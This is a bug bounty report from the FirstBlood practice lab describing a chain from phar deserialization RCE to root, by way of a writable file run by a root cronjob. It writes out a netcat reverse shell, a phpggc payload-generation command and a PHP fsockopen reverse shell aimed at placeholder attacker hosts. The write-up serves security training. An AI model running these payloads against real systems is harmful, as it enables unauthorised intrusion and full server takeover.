FirstBlood-#916 — FirstBlood server Rooted!
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-30, newrouge Level 3 reported:
Hey, I would like to report that it's possible to get
rootuser on firstblood server, due to some insecure cronjobs running by root user and user fb-exec have write permission over it, and low privilge user can escalate to root by abusing it.
- As i mentioned in report (
https://www.bugbountyhunter.com/hackevents/report?id=622), that it is possible to get RCE due to insecure deserialization by adding the phar:// stream handler to the path of proof uploaded.
Upload a malicious generated phar file on server with payload.
nc -e /bin/bash <YOUR_IP> <PORT>
./phpggc -pj test.jpg -o test.phar monolog/rce1 system "nc -e /bin/bash <ip> <port>
Upload this file on server, and capture the proof request, and append phar:// stream to path.
Have your listener ready and send the request.
Now let's do some recon we find another directory inside
Inside it we find that cronjob is running on server
Let's see what that
And fb-exec user have write permission over that file.
Uhhh here we go again, Patrcie!
Let's put our php reverse shell in this scheduler.php file, and start a listener on other port on our local machine,
echo '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");' >> scheduler.php
Now wait for a moment and , and you will get shell as root user.
Thank you & sorry for little meme i hope that's ok :)
FirstBlood ID: 35
Vulnerability Type: RCE
A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.